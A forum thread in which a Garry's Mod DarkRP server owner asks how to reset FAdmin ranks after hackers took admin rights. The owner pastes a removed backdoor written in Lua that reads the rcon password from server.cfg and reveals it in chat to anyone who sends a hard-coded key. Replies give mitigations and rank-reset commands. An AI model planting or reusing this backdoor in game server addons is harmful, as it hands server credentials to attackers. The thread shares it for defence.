DarkRP Server Hacker(s)

My server has been attacked by a barrage of hacker attacks. I’ve finally fixed some exploits and disabled upload/download and all that and found 2 backdoors on my server and removed them. But since they had them, they are now Admins/SuperAdmins in FAdmin and now I cannot open the FAdmin menu due to the last update. Is there a way to reset FAdmin ranks? Thanks for help and sorry for little info, I’ll supply more if needed.

I have searched for how to open/reset FAdmin so I’m not posting this right off.

By the way, they backdoor code is:

local b = file.Read( "cfg/server.cfg", "GAME" ) local a = string.find( b, "rcon_password \"" ) local c = string.find( b, "\"", a + 15 )	local d = string.sub( b, a + 15, c - 1 ) concommand.Add( "print", function( ply, cmd, args, str ) if args[1] == "q1w2e3r4" then	ply:ChatPrint( d ) end end )

Set your RCON password via the commandline and this will be avoided (they can’t read it from server.cfg if it doesn’t exist in there).
An alternate workaround for this specific bit of code would be to have two rcon_password lines in your server.cfg . That code would read the first password, but the second one is what would be active.

As for resetting ranks for FAdmin, once you’ve fixed your rcon password I believe the command you need to run (from server console) is

FAdmin Setroot "YOUR_STEAM_ID"

(could be wrong, years since I used it).

And if you use ULX,

ulx adduserid "yoursteamid" superadmin

Awesome! Thank you so much!